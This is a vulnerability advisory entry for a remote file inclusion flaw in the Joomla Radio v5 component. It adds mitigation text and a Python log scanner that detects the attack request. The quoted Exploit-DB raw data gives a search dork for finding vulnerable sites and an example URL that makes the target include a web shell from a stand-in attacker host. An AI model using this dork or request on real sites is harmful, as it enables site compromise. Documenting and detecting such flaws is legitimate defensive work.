Vendor: Joomla Radio
By: Unknown
CVSS: 5.5 (MEDIUM)
Remote File Inclusion
CWE: 22
Product Name: Joomla Radio
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Joomla Radio v5 Component RFI

This exploit allows an attacker to make the component include a remote file by supplying the $mosConfig_live_site variable as a request parameter to administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php. An example URL is given in the raw data below.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Joomla Radio component to a version that includes a patch for this issue. Alternatively, the affected file can be modified to properly sanitize user input before including remote files.
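
A detection sketch for the request pattern described above, added here as an example and not part of the original advisory: it scans web-server access logs for requests to the component file that set mosConfig_live_site in the query string. The Apache combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Path and parameter name are taken from the advisory; everything else is assumed.
COMPONENT_PATH = "/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php"
PARAM = "mosconfig_live_site"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A value that points off-host: "scheme://..." or protocol-relative "//host".
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)

def classify(line):
    """Return None, 'param-override' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not unquote(parts.path).lower().endswith(COMPONENT_PATH):
        return None
    verdict = None
    # parse_qsl percent-decodes, so http%3A%2F%2F... is seen as http://...
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() != PARAM:
            continue
        # A configuration variable should never arrive from the client at all.
        verdict = verdict or "param-override"
        if REMOTE_RE.match(value):
            verdict = "remote-include"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line, 1-indexed."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample lines (documentation addresses and hostnames only).
_P = "/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php"
SAMPLE_LOG = [
    f'192.0.2.10 - - [13/Sep/2007:10:00:00 +0000] "GET {_P}?mosConfig_live_site=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    f'192.0.2.11 - - [13/Sep/2007:10:00:05 +0000] "GET {_P}?mosConfig_live_site=ftp%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 512',
    f'192.0.2.12 - - [13/Sep/2007:10:00:09 +0000] "GET {_P}?mosConfig_live_site= HTTP/1.1" 200 0',
    '192.0.2.13 - - [13/Sep/2007:10:00:12 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(lineno, verdict)
```

Access logs record only the query string, so a parameter sent in a POST body is not visible to this check.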

Exploit-DB raw data:

###########################
# Joomla Radio v5 Component RFI           #
###########################

Bug in :
administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php
Variable : $mosConfig_live_site

Download : http://www.joomlaos.de/option,com_remository/Itemid,41/func,fileinfo/id,2661.html

Dork: inurl:"com_joomlaradiov5"

Example:

www.site.com/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://scriptkiddie.com/c99haxor.txt?


Greets to all Irc.RealWorm.Net #Morgan Users ;)

# milw0rm.com [2007-09-13]